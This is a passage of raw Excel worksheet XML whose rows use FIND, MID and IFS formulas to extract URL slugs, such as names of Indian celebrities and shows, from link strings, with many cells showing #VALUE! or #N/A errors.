    </row>
    <row r="173" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A173" t="s">
        <v>2325</v>
      </c>
      <c r="B173" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C173" t="str">
        <f t="shared" si="8"/>
        <v>wamiqa-gabbi/</v>
      </c>
      <c r="D173" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E173" t="str" cm="1">
        <f t="array" ref="E173">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A173)), MID($A173, FIND("name=",$A173) + 5, LEN($A173) - FIND("name=",$A173)),
    ISNUMBER(FIND("tag/",$A173)), MID($A173, FIND("tag/",$A173) + 4, LEN($A173) - FIND("tag/",$A173)),
    ISNUMBER(FIND("category",$A173)), MID($A173, FIND("category",$A173) + 9, LEN($A173) - FIND("category",$A173)))</f>
        <v>wamiqa-gabbi/</v>
      </c>
      <c r="F173" t="s">
        <v>3325</v>
      </c>
    </row>
    <row r="174" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A174" t="s">
        <v>2320</v>
      </c>
      <c r="B174" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C174" t="str">
        <f t="shared" si="8"/>
        <v>swetha-changappa/</v>
      </c>
      <c r="D174" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E174" t="str" cm="1">
        <f t="array" ref="E174">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A174)), MID($A174, FIND("name=",$A174) + 5, LEN($A174) - FIND("name=",$A174)),
    ISNUMBER(FIND("tag/",$A174)), MID($A174, FIND("tag/",$A174) + 4, LEN($A174) - FIND("tag/",$A174)),
    ISNUMBER(FIND("category",$A174)), MID($A174, FIND("category",$A174) + 9, LEN($A174) - FIND("category",$A174)))</f>
        <v>swetha-changappa/</v>
      </c>
      <c r="F174" t="s">
        <v>3321</v>
      </c>
    </row>
    <row r="175" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A175" t="s">
        <v>2320</v>
      </c>
      <c r="B175" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C175" t="str">
        <f t="shared" si="8"/>
        <v>swetha-changappa/</v>
      </c>
      <c r="D175" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E175" t="str" cm="1">
        <f t="array" ref="E175">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A175)), MID($A175, FIND("name=",$A175) + 5, LEN($A175) - FIND("name=",$A175)),
    ISNUMBER(FIND("tag/",$A175)), MID($A175, FIND("tag/",$A175) + 4, LEN($A175) - FIND("tag/",$A175)),
    ISNUMBER(FIND("category",$A175)), MID($A175, FIND("category",$A175) + 9, LEN($A175) - FIND("category",$A175)))</f>
        <v>swetha-changappa/</v>
      </c>
      <c r="F175" t="s">
        <v>3321</v>
      </c>
    </row>
    <row r="176" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A176" t="s">
        <v>2326</v>
      </c>
      <c r="B176" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C176" t="str">
        <f t="shared" si="8"/>
        <v>madhuri-braganza/</v>
      </c>
      <c r="D176" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E176" t="str" cm="1">
        <f t="array" ref="E176">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A176)), MID($A176, FIND("name=",$A176) + 5, LEN($A176) - FIND("name=",$A176)),
    ISNUMBER(FIND("tag/",$A176)), MID($A176, FIND("tag/",$A176) + 4, LEN($A176) - FIND("tag/",$A176)),
    ISNUMBER(FIND("category",$A176)), MID($A176, FIND("category",$A176) + 9, LEN($A176) - FIND("category",$A176)))</f>
        <v>madhuri-braganza/</v>
      </c>
      <c r="F176" t="s">
        <v>3326</v>
      </c>
    </row>
    <row r="177" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A177" t="s">
        <v>2319</v>
      </c>
      <c r="B177" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C177" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D177" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E177" t="e" cm="1">
        <f t="array" ref="E177">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A177)), MID($A177, FIND("name=",$A177) + 5, LEN($A177) - FIND("name=",$A177)),
    ISNUMBER(FIND("tag/",$A177)), MID($A177, FIND("tag/",$A177) + 4, LEN($A177) - FIND("tag/",$A177)),
    ISNUMBER(FIND("category",$A177)), MID($A177, FIND("category",$A177) + 9, LEN($A177) - FIND("category",$A177)))</f>
        <v>#N/A</v>
      </c>
      <c r="F177" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="178" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A178" t="s">
        <v>2327</v>
      </c>
      <c r="B178" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C178" t="str">
        <f t="shared" si="8"/>
        <v>1920-bollywood-movie/</v>
      </c>
      <c r="D178" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E178" t="str" cm="1">
        <f t="array" ref="E178">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A178)), MID($A178, FIND("name=",$A178) + 5, LEN($A178) - FIND("name=",$A178)),
    ISNUMBER(FIND("tag/",$A178)), MID($A178, FIND("tag/",$A178) + 4, LEN($A178) - FIND("tag/",$A178)),
    ISNUMBER(FIND("category",$A178)), MID($A178, FIND("category",$A178) + 9, LEN($A178) - FIND("category",$A178)))</f>
        <v>1920-bollywood-movie/</v>
      </c>
      <c r="F178" t="s">
        <v>3327</v>
      </c>
    </row>
    <row r="179" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A179" t="s">
        <v>2248</v>
      </c>
      <c r="B179" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C179" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D179" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E179" t="e" cm="1">
        <f t="array" ref="E179">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A179)), MID($A179, FIND("name=",$A179) + 5, LEN($A179) - FIND("name=",$A179)),
    ISNUMBER(FIND("tag/",$A179)), MID($A179, FIND("tag/",$A179) + 4, LEN($A179) - FIND("tag/",$A179)),
    ISNUMBER(FIND("category",$A179)), MID($A179, FIND("category",$A179) + 9, LEN($A179) - FIND("category",$A179)))</f>
        <v>#N/A</v>
      </c>
      <c r="F179" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="180" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A180" t="s">
        <v>2328</v>
      </c>
      <c r="B180" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C180" t="str">
        <f t="shared" si="8"/>
        <v>mukesh-gahlot/</v>
      </c>
      <c r="D180" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E180" t="str" cm="1">
        <f t="array" ref="E180">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A180)), MID($A180, FIND("name=",$A180) + 5, LEN($A180) - FIND("name=",$A180)),
    ISNUMBER(FIND("tag/",$A180)), MID($A180, FIND("tag/",$A180) + 4, LEN($A180) - FIND("tag/",$A180)),
    ISNUMBER(FIND("category",$A180)), MID($A180, FIND("category",$A180) + 9, LEN($A180) - FIND("category",$A180)))</f>
        <v>mukesh-gahlot/</v>
      </c>
      <c r="F180" t="s">
        <v>3328</v>
      </c>
    </row>
    <row r="181" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A181" t="s">
        <v>2329</v>
      </c>
      <c r="B181" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C181" t="str">
        <f t="shared" si="8"/>
        <v>mukhota-dance/</v>
      </c>
      <c r="D181" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E181" t="str" cm="1">
        <f t="array" ref="E181">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A181)), MID($A181, FIND("name=",$A181) + 5, LEN($A181) - FIND("name=",$A181)),
    ISNUMBER(FIND("tag/",$A181)), MID($A181, FIND("tag/",$A181) + 4, LEN($A181) - FIND("tag/",$A181)),
    ISNUMBER(FIND("category",$A181)), MID($A181, FIND("category",$A181) + 9, LEN($A181) - FIND("category",$A181)))</f>
        <v>mukhota-dance/</v>
      </c>
      <c r="F181" t="s">
        <v>3329</v>
      </c>
    </row>
    <row r="182" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A182" t="s">
        <v>2330</v>
      </c>
      <c r="B182" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C182" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D182" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E182" t="e" cm="1">
        <f t="array" ref="E182">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A182)), MID($A182, FIND("name=",$A182) + 5, LEN($A182) - FIND("name=",$A182)),
    ISNUMBER(FIND("tag/",$A182)), MID($A182, FIND("tag/",$A182) + 4, LEN($A182) - FIND("tag/",$A182)),
    ISNUMBER(FIND("category",$A182)), MID($A182, FIND("category",$A182) + 9, LEN($A182) - FIND("category",$A182)))</f>
        <v>#N/A</v>
      </c>
      <c r="F182" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="183" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A183" t="s">
        <v>2331</v>
      </c>
      <c r="B183" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C183" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D183" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E183" t="e" cm="1">
        <f t="array" ref="E183">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A183)), MID($A183, FIND("name=",$A183) + 5, LEN($A183) - FIND("name=",$A183)),
    ISNUMBER(FIND("tag/",$A183)), MID($A183, FIND("tag/",$A183) + 4, LEN($A183) - FIND("tag/",$A183)),
    ISNUMBER(FIND("category",$A183)), MID($A183, FIND("category",$A183) + 9, LEN($A183) - FIND("category",$A183)))</f>
        <v>#N/A</v>
      </c>
      <c r="F183" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="184" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A184" t="s">
        <v>2332</v>
      </c>
      <c r="B184" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C184" t="str">
        <f t="shared" si="8"/>
        <v>anasuya-bharadwaj/</v>
      </c>
      <c r="D184" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E184" t="str" cm="1">
        <f t="array" ref="E184">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A184)), MID($A184, FIND("name=",$A184) + 5, LEN($A184) - FIND("name=",$A184)),
    ISNUMBER(FIND("tag/",$A184)), MID($A184, FIND("tag/",$A184) + 4, LEN($A184) - FIND("tag/",$A184)),
    ISNUMBER(FIND("category",$A184)), MID($A184, FIND("category",$A184) + 9, LEN($A184) - FIND("category",$A184)))</f>
        <v>anasuya-bharadwaj/</v>
      </c>
      <c r="F184" t="s">
        <v>3330</v>
      </c>
    </row>
    <row r="185" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A185" t="s">
        <v>2329</v>
      </c>
      <c r="B185" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C185" t="str">
        <f t="shared" si="8"/>
        <v>mukhota-dance/</v>
      </c>
      <c r="D185" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E185" t="str" cm="1">
        <f t="array" ref="E185">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A185)), MID($A185, FIND("name=",$A185) + 5, LEN($A185) - FIND("name=",$A185)),
    ISNUMBER(FIND("tag/",$A185)), MID($A185, FIND("tag/",$A185) + 4, LEN($A185) - FIND("tag/",$A185)),
    ISNUMBER(FIND("category",$A185)), MID($A185, FIND("category",$A185) + 9, LEN($A185) - FIND("category",$A185)))</f>
        <v>mukhota-dance/</v>
      </c>
      <c r="F185" t="s">
        <v>3329</v>
      </c>
    </row>
    <row r="186" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A186" t="s">
        <v>2333</v>
      </c>
      <c r="B186" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C186" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D186" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E186" t="e" cm="1">
        <f t="array" ref="E186">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A186)), MID($A186, FIND("name=",$A186) + 5, LEN($A186) - FIND("name=",$A186)),
    ISNUMBER(FIND("tag/",$A186)), MID($A186, FIND("tag/",$A186) + 4, LEN($A186) - FIND("tag/",$A186)),
    ISNUMBER(FIND("category",$A186)), MID($A186, FIND("category",$A186) + 9, LEN($A186) - FIND("category",$A186)))</f>
        <v>#N/A</v>
      </c>
      <c r="F186" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="187" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A187" t="s">
        <v>2334</v>
      </c>
      <c r="B187" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C187" t="str">
        <f t="shared" si="8"/>
        <v>rashi-modi/</v>
      </c>
      <c r="D187" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E187" t="str" cm="1">
        <f t="array" ref="E187">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A187)), MID($A187, FIND("name=",$A187) + 5, LEN($A187) - FIND("name=",$A187)),
    ISNUMBER(FIND("tag/",$A187)), MID($A187, FIND("tag/",$A187) + 4, LEN($A187) - FIND("tag/",$A187)),
    ISNUMBER(FIND("category",$A187)), MID($A187, FIND("category",$A187) + 9, LEN($A187) - FIND("category",$A187)))</f>
        <v>rashi-modi/</v>
      </c>
      <c r="F187" t="s">
        <v>3331</v>
      </c>
    </row>
    <row r="188" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A188" t="s">
        <v>2333</v>
      </c>
      <c r="B188" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C188" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D188" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E188" t="e" cm="1">
        <f t="array" ref="E188">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A188)), MID($A188, FIND("name=",$A188) + 5, LEN($A188) - FIND("name=",$A188)),
    ISNUMBER(FIND("tag/",$A188)), MID($A188, FIND("tag/",$A188) + 4, LEN($A188) - FIND("tag/",$A188)),
    ISNUMBER(FIND("category",$A188)), MID($A188, FIND("category",$A188) + 9, LEN($A188) - FIND("category",$A188)))</f>
        <v>#N/A</v>
      </c>
      <c r="F188" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="189" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A189" t="s">
        <v>2334</v>
      </c>
      <c r="B189" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C189" t="str">
        <f t="shared" si="8"/>
        <v>rashi-modi/</v>
      </c>
      <c r="D189" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E189" t="str" cm="1">
        <f t="array" ref="E189">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A189)), MID($A189, FIND("name=",$A189) + 5, LEN($A189) - FIND("name=",$A189)),
    ISNUMBER(FIND("tag/",$A189)), MID($A189, FIND("tag/",$A189) + 4, LEN($A189) - FIND("tag/",$A189)),
    ISNUMBER(FIND("category",$A189)), MID($A189, FIND("category",$A189) + 9, LEN($A189) - FIND("category",$A189)))</f>
        <v>rashi-modi/</v>
      </c>
      <c r="F189" t="s">
        <v>3331</v>
      </c>
    </row>
    <row r="190" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A190" t="s">
        <v>2319</v>
      </c>
      <c r="B190" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C190" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D190" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E190" t="e" cm="1">
        <f t="array" ref="E190">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A190)), MID($A190, FIND("name=",$A190) + 5, LEN($A190) - FIND("name=",$A190)),
    ISNUMBER(FIND("tag/",$A190)), MID($A190, FIND("tag/",$A190) + 4, LEN($A190) - FIND("tag/",$A190)),
    ISNUMBER(FIND("category",$A190)), MID($A190, FIND("category",$A190) + 9, LEN($A190) - FIND("category",$A190)))</f>
        <v>#N/A</v>
      </c>
      <c r="F190" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="191" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A191" t="s">
        <v>2335</v>
      </c>
      <c r="B191" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C191" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D191" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E191" t="e" cm="1">
        <f t="array" ref="E191">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A191)), MID($A191, FIND("name=",$A191) + 5, LEN($A191) - FIND("name=",$A191)),
    ISNUMBER(FIND("tag/",$A191)), MID($A191, FIND("tag/",$A191) + 4, LEN($A191) - FIND("tag/",$A191)),
    ISNUMBER(FIND("category",$A191)), MID($A191, FIND("category",$A191) + 9, LEN($A191) - FIND("category",$A191)))</f>
        <v>#N/A</v>
      </c>
      <c r="F191" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="192" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A192" t="s">
        <v>2336</v>
      </c>
      <c r="B192" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C192" t="str">
        <f t="shared" si="8"/>
        <v>bigg-boss-8-kannada/</v>
      </c>
      <c r="D192" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E192" t="str" cm="1">
        <f t="array" ref="E192">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A192)), MID($A192, FIND("name=",$A192) + 5, LEN($A192) - FIND("name=",$A192)),
    ISNUMBER(FIND("tag/",$A192)), MID($A192, FIND("tag/",$A192) + 4, LEN($A192) - FIND("tag/",$A192)),
    ISNUMBER(FIND("category",$A192)), MID($A192, FIND("category",$A192) + 9, LEN($A192) - FIND("category",$A192)))</f>
        <v>bigg-boss-8-kannada/</v>
      </c>
      <c r="F192" t="s">
        <v>3332</v>
      </c>
    </row>
    <row r="193" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A193" t="s">
        <v>2248</v>
      </c>
      <c r="B193" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C193" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D193" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E193" t="e" cm="1">
        <f t="array" ref="E193">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A193)), MID($A193, FIND("name=",$A193) + 5, LEN($A193) - FIND("name=",$A193)),
    ISNUMBER(FIND("tag/",$A193)), MID($A193, FIND("tag/",$A193) + 4, LEN($A193) - FIND("tag/",$A193)),
    ISNUMBER(FIND("category",$A193)), MID($A193, FIND("category",$A193) + 9, LEN($A193) - FIND("category",$A193)))</f>
        <v>#N/A</v>
      </c>
      <c r="F193" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="194" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A194" t="s">
        <v>2319</v>
      </c>
      <c r="B194" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C194" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D194" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E194" t="e" cm="1">
        <f t="array" ref="E194">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A194)), MID($A194, FIND("name=",$A194) + 5, LEN($A194) - FIND("name=",$A194)),
    ISNUMBER(FIND("tag/",$A194)), MID($A194, FIND("tag/",$A194) + 4, LEN($A194) - FIND("tag/",$A194)),
    ISNUMBER(FIND("category",$A194)), MID($A194, FIND("category",$A194) + 9, LEN($A194) - FIND("category",$A194)))</f>
        <v>#N/A</v>
      </c>
      <c r="F194" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="195" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A195" t="s">
        <v>2319</v>
      </c>
      <c r="B195" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C195" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D195" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E195" t="e" cm="1">
        <f t="array" ref="E195">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A195)), MID($A195, FIND("name=",$A195) + 5, LEN($A195) - FIND("name=",$A195)),
    ISNUMBER(FIND("tag/",$A195)), MID($A195, FIND("tag/",$A195) + 4, LEN($A195) - FIND("tag/",$A195)),
    ISNUMBER(FIND("category",$A195)), MID($A195, FIND("category",$A195) + 9, LEN($A195) - FIND("category",$A195)))</f>
        <v>#N/A</v>
      </c>
      <c r="F195" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="196" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A196" t="s">
        <v>2319</v>
      </c>
      <c r="B196" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C196" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D196" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E196" t="e" cm="1">
        <f t="array" ref="E196">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A196)), MID($A196, FIND("name=",$A196) + 5, LEN($A196) - FIND("name=",$A196)),
    ISNUMBER(FIND("tag/",$A196)), MID($A196, FIND("tag/",$A196) + 4, LEN($A196) - FIND("tag/",$A196)),
    ISNUMBER(FIND("category",$A196)), MID($A196, FIND("category",$A196) + 9, LEN($A196) - FIND("category",$A196)))</f>
        <v>#N/A</v>
      </c>
      <c r="F196" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="197" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A197" t="s">
        <v>2319</v>
      </c>
      <c r="B197" t="e">
        <f t="shared" si="7"/>
        <v>#VALUE!</v>
      </c>
      <c r="C197" t="e">
        <f t="shared" si="8"/>
        <v>#VALUE!</v>
      </c>
      <c r="D197" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E197" t="e" cm="1">
        <f t="array" ref="E197">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A197)), MID($A197, FIND("name=",$A197) + 5, LEN($A197) - FIND("name=",$A197)),
    ISNUMBER(FIND("tag/",$A197)), MID($A197, FIND("tag/",$A197) + 4, LEN($A197) - FIND("tag/",$A197)),
    ISNUMBER(FIND("category",$A197)), MID($A197, FIND("category",$A197) + 9, LEN($A197) - FIND("category",$A197)))</f>
        <v>#N/A</v>
      </c>
      <c r="F197" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="198" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A198" t="s">
        <v>2248</v>
      </c>
      <c r="B198" t="e">
        <f t="shared" ref="B198:B261" si="10">IF(FIND("name=",A198,1)&gt;0,MID(A198,FIND("name=",A198,1)+5,LEN(A198)-FIND("name=",A198,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C198" t="e">
        <f t="shared" ref="C198:C261" si="11">IF(FIND("tag/",$A198,1)&gt;0,MID($A198,FIND("tag/",$A198,1)+4,LEN($A198)-FIND("tag/",$A198,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D198" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E198" t="e" cm="1">
        <f t="array" ref="E198">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A198)), MID($A198, FIND("name=",$A198) + 5, LEN($A198) - FIND("name=",$A198)),
    ISNUMBER(FIND("tag/",$A198)), MID($A198, FIND("tag/",$A198) + 4, LEN($A198) - FIND("tag/",$A198)),
    ISNUMBER(FIND("category",$A198)), MID($A198, FIND("category",$A198) + 9, LEN($A198) - FIND("category",$A198)))</f>
        <v>#N/A</v>
      </c>
      <c r="F198" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="199" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A199" t="s">
        <v>2260</v>
      </c>
      <c r="B199" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C199" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D199" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E199" t="e" cm="1">
        <f t="array" ref="E199">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A199)), MID($A199, FIND("name=",$A199) + 5, LEN($A199) - FIND("name=",$A199)),
    ISNUMBER(FIND("tag/",$A199)), MID($A199, FIND("tag/",$A199) + 4, LEN($A199) - FIND("tag/",$A199)),
    ISNUMBER(FIND("category",$A199)), MID($A199, FIND("category",$A199) + 9, LEN($A199) - FIND("category",$A199)))</f>
        <v>#N/A</v>
      </c>
      <c r="F199" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="200" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A200" t="s">
        <v>2337</v>
      </c>
      <c r="B200" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C200" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D200" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E200" t="e" cm="1">
        <f t="array" ref="E200">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A200)), MID($A200, FIND("name=",$A200) + 5, LEN($A200) - FIND("name=",$A200)),
    ISNUMBER(FIND("tag/",$A200)), MID($A200, FIND("tag/",$A200) + 4, LEN($A200) - FIND("tag/",$A200)),
    ISNUMBER(FIND("category",$A200)), MID($A200, FIND("category",$A200) + 9, LEN($A200) - FIND("category",$A200)))</f>
        <v>#N/A</v>
      </c>
      <c r="F200" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="201" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A201" t="s">
        <v>2262</v>
      </c>
      <c r="B201" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C201" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D201" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E201" t="e" cm="1">
        <f t="array" ref="E201">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A201)), MID($A201, FIND("name=",$A201) + 5, LEN($A201) - FIND("name=",$A201)),
    ISNUMBER(FIND("tag/",$A201)), MID($A201, FIND("tag/",$A201) + 4, LEN($A201) - FIND("tag/",$A201)),
    ISNUMBER(FIND("category",$A201)), MID($A201, FIND("category",$A201) + 9, LEN($A201) - FIND("category",$A201)))</f>
        <v>#N/A</v>
      </c>
      <c r="F201" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="202" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A202" t="s">
        <v>2338</v>
      </c>
      <c r="B202" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C202" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D202" t="e">
        <f t="shared" si="9"/>
        <v>#VALUE!</v>
      </c>
      <c r="E202" t="e" cm="1">
        <f t="array" ref="E202">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A202)), MID($A202, FIND("name=",$A202) + 5, LEN($A202) - FIND("name=",$A202)),
    ISNUMBER(FIND("tag/",$A202)), MID($A202, FIND("tag/",$A202) + 4, LEN($A202) - FIND("tag/",$A202)),
    ISNUMBER(FIND("category",$A202)), MID($A202, FIND("category",$A202) + 9, LEN($A202) - FIND("category",$A202)))</f>
        <v>#N/A</v>
      </c>
      <c r="F202" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="203" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A203" t="s">
        <v>2260</v>
      </c>
      <c r="B203" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C203" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D203" t="e">
